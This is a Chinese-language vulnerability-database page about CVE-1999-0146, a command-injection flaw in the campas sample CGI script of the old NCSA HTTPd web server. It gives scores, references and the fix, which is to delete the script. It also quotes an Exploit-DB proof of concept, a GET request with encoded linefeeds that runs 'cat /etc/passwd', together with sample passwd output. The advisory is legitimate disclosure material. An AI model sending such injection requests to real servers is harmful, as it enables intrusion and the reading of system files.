CVE-1999-0146
CVSS7.5
发布时间 :1997-07-15 00:00:00
修订时间 :2008-09-09 08:33:50
NMCOE    

[原文]The campas CGI program provided with some NCSA web servers allows an attacker to execute arbitrary commands via encoded carriage return characters in the query string, as demonstrated by reading the password file.


[CNNVD]NCSA HTTPd样本脚本漏洞(CNNVD-199707-024)

        提供一些NCSA web服务器的campas CGI程序存在漏洞。攻击者可以借助查询字符串中的编码回车字符执行任意命令,正如读取密码文件。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ncsa:campas
cpe:/a:ncsa:servers

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0146
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0146
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199707-024
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/298
(UNKNOWN)  XF  http-cgi-campas(298)
http://www.securityfocus.com/bid/1975
(UNKNOWN)  BID  1975

- 漏洞信息

NCSA HTTPd样本脚本漏洞
高危 输入验证
1997-07-15 00:00:00 2006-11-16 00:00:00
远程※本地  
        提供一些NCSA web服务器的campas CGI程序存在漏洞。攻击者可以借助查询字符串中的编码回车字符执行任意命令,正如读取密码文件。

- 公告与补丁

        Delete the sample script, as it is not necessary for normal web server function.

- 漏洞信息 (20423)

NCSA httpd-campas 1.2 sample script Vulnerability (EDBID:20423)
cgi remote
1997-07-15 Verified
0 Francisco Torres
N/A [点击下载]
source: http://www.securityfocus.com/bid/1975/info

Campas is a sample CGI script shipped with some older versions of NCSA HTTPd, an obsolete web server package. The versions that included the script could not be determined as the server is no longer maintained, but version 1.2 of the script itself is known to be vulnerable. The script fails to properly filter user supplied variables, and as a result can be used to execute commands on the host with the privileges of the web server. Commands can be passed as a variable to the script, separated by %0a (linefeed) characters. See exploit for example. Successful exploitation of this vulnerability could be used to deface the web site, read any files the server process has access to, get directory listings, and execute anything else the web server has access to. 

> telnet target 80
[...]
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
<PRE>
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
[...]

		

- 漏洞信息

29
NCSA campas CGI Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Workaround
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1997-07-15 Unknow
1997-07-15 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站